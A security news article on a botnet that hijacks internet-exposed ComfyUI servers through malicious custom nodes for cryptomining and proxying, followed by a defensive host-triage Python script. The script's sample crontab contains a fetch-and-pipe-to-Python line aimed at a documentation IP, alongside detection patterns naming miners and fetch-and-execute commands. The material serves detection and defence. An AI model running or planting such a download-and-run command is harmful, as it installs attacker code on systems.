ComfyUI servers: Attackers turn instances into a cryptominer proxy botnet
More than 1000 ComfyUI servers are exposed to the internet. Attackers exploit misconfigurations to add instances to a botnet.
IT researchers are observing a wave of attacks in which malicious actors are incorporating ComfyUI servers into a botnet. In this botnet, the compromised instances serve as cryptominers and proxy servers.
This is reported by IT security researchers from Censys in a blog post. The observed attack wave began on March 12, 2026. At that time, Censys systems discovered a rapidly filling directory at a bulletproof hoster in which the attackers were apparently collecting the results of their internet scans. The investigation showed that the perpetrators are targeting ComfyUI instances that are openly reachable from the internet; the Censys researchers found more than a thousand such installations online. The attackers abuse the custom node ecosystem to deliver malware without any prior authentication: "custom nodes" are third-party modules that ComfyUI loads as extensions, and on a misconfigured instance they can apparently be installed without logging in.
A scanner written in Python sweeps large IP ranges for vulnerable targets and, unless it already finds an exploitable node on the target, automatically installs malicious nodes through the ComfyUI Manager. The attackers control the compromised servers centrally through a Flask-based command-and-control dashboard. The instances ultimately mine Monero with XMRig and Conflux with lolMiner, and they also serve as nodes of a "Hysteria v2" proxy botnet.
Persistent Malware
According to the analysts, the malware's persistence is sophisticated. It tries to evade detection by running filelessly, without dropping files to disk, and by disguising itself as a kernel-thread process. It also anchors itself as an LD_PRELOAD rootkit, which overrides library functions in every dynamically linked program that starts. In addition, the "ghost.sh" malware has three independent "revival mechanisms" that survive both the removal of the cryptominer component and system restarts.
The Python scanner also receives updates: the researchers report that version 8.2 added two new re-infection mechanisms. One poses as a "GPU Performance Monitor" node and re-downloads the malicious code every six hours; the other hides in a startup workflow that has been poisoned with the malware.
More detailed information can be found in the analysis. At its end, the Censys staff also list several indicators of compromise (IOCs) with which ComfyUI administrators can check whether their instances were hit in the current attack wave.
ComfyUI is a popular open-source toolkit for generating AI images and videos locally; it can serve, for example, as an alternative to the easier-to-use Amuse. For security reasons, however, ComfyUI servers should only be reachable within the LAN or via VPN and should never be exposed directly to the internet.
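The following triage script is an added example for this article, not code from Censys or from the ComfyUI project, and it is no substitute for the IOC list in the analysis. It turns the signals described above into checks an administrator can run against a host: a ComfyUI listener bound to all interfaces (the exposure warned about here), custom nodes nobody approved, an entry in /etc/ld.so.preload (the LD_PRELOAD rootkit), user-space processes posing as kernel threads, and cron jobs that fetch and execute remote code on a schedule, such as a six-hourly re-download. The default port 8188, the sample paths, the TEST-NET address and every input line are constructed assumptions, not indicators taken from the report.

```python
"""Host triage for the ComfyUI abuse described above (added example, not
Censys' IOC list and not ComfyUI project code). All sample input below is
constructed; port, paths and addresses are assumptions."""
import re
from dataclasses import dataclass

COMFY_PORT = "8188"                                     # ComfyUI default port (assumption)
WILDCARD_ADDRS = {"0.0.0.0", "*", "::", "[::]"}
SUSPECT_NAMES = {"xmrig", "lolminer", "hysteria", "ghost.sh"}   # tool names from the article
SUSPECT_NODE_NAMES = {"gpu performance monitor"}                 # lure node name from the article
KTHREAD_STYLE = re.compile(r"^\[(kworker|kthreadd|ksoftirqd|migration)[^\]]*\]$")

@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "medium"
    source: str     # which input produced it
    detail: str

def check_listeners(ss_lines):
    """`ss -ltn` output: flag the ComfyUI port bound to every interface."""
    out = []
    for line in ss_lines:
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        if port == COMFY_PORT and addr in WILDCARD_ADDRS:
            out.append(Finding("medium", "listeners",
                               f"port {port} listens on {addr}, reachable beyond localhost"))
    return out

def check_custom_nodes(installed, approved):
    """Directory names under custom_nodes/ compared with the admin's own allowlist."""
    out = []
    for name in installed:
        if name.lower() in SUSPECT_NODE_NAMES:
            out.append(Finding("high", "custom_nodes", f"node '{name}' matches a known lure name"))
        elif name not in approved:
            out.append(Finding("medium", "custom_nodes", f"node '{name}' is not on the allowlist"))
    return out

def check_ld_preload(preload_lines):
    """/etc/ld.so.preload: any active entry is injected into every dynamically linked program."""
    return [Finding("high", "ld.so.preload", f"preload entry: {l.strip()}")
            for l in preload_lines if l.strip() and not l.lstrip().startswith("#")]

def check_processes(ps_lines):
    """`ps -eo pid,ppid,comm,args`: kernel-thread names whose parent is not kthreadd,
    plus suspect binaries matched by basename."""
    out = []
    for line in ps_lines:
        parts = line.split(None, 3)
        if len(parts) < 4 or not parts[0].isdigit():
            continue
        pid, ppid, _comm, args = parts
        if KTHREAD_STYLE.match(args) and ppid not in ("0", "2"):   # real ones hang off pid 2
            out.append(Finding("high", "processes",
                               f"pid {pid} poses as a kernel thread ({args}) but its parent is pid {ppid}"))
        exe = args.split()[0].rsplit("/", 1)[-1].lower()
        if exe in SUSPECT_NAMES:
            out.append(Finding("high", "processes", f"pid {pid} runs {exe}"))
    return out

def check_cron(cron_lines):
    """Crontab lines that fetch remote content and pipe it into an interpreter."""
    fetch_exec = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b")
    out = []
    for line in cron_lines:
        parts = line.split(None, 5)
        if len(parts) < 6 or parts[0].startswith("#"):
            continue
        if fetch_exec.search(parts[5]):
            out.append(Finding("high", "cron", f"fetch-and-execute job: {line.strip()}"))
    return out

# Constructed samples (not from a real host); 198.51.100.0/24 is a documentation range.
SAMPLE_SS = ["State Recv-Q Send-Q Local Address:Port Peer Address:Port",
             "LISTEN 0 128 0.0.0.0:8188 0.0.0.0:*",
             "LISTEN 0 128 127.0.0.1:22 0.0.0.0:*"]
SAMPLE_NODES = ["ComfyUI-Manager", "GPU Performance Monitor", "comfyui_controlnet_aux"]
APPROVED_NODES = {"ComfyUI-Manager", "comfyui_controlnet_aux"}
SAMPLE_PRELOAD = ["# comment", "/usr/local/lib/libexample.so"]   # hypothetical path
SAMPLE_PS = ["    PID    PPID COMMAND         COMMAND",
             "      2       0 kthreadd        [kthreadd]",
             "     15       2 kworker/0:1     [kworker/0:1]",
             "   4242       1 kworker/0:1     [kworker/0:1]",
             "   4300    4242 xmrig           /tmp/.x/xmrig -o pool.invalid:3333"]
SAMPLE_CRON = ["# m h dom mon dow command",
               "0 */6 * * * curl -s http://198.51.100.7/n.py | python3",
               "17 3 * * * /usr/bin/logrotate /etc/logrotate.conf"]

def triage(ss=SAMPLE_SS, nodes=SAMPLE_NODES, approved=APPROVED_NODES,
           preload=SAMPLE_PRELOAD, ps=SAMPLE_PS, cron=SAMPLE_CRON):
    """Run every check and return the findings, high severity first."""
    findings = (check_listeners(ss) + check_custom_nodes(nodes, approved)
                + check_ld_preload(preload) + check_processes(ps) + check_cron(cron))
    return sorted(findings, key=lambda f: f.severity != "high")

if __name__ == "__main__":
    for f in triage():
        print(f"[{f.severity}] {f.source}: {f.detail}")
```

On a real host, feed the functions the output of `ss -ltn`, a listing of the custom_nodes directory, the contents of /etc/ld.so.preload, `ps -eo pid,ppid,comm,args` and the crontabs of root and the ComfyUI user. The kernel-thread check relies on the fact that genuine kernel threads are children of kthreadd (pid 2), so a bracketed name under any other parent is worth a look; and because an LD_PRELOAD rootkit can hook the very library calls that `ps` and `ls` use, treat a clean result from the compromised host itself with caution and confirm from a rescue environment.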
(dmk)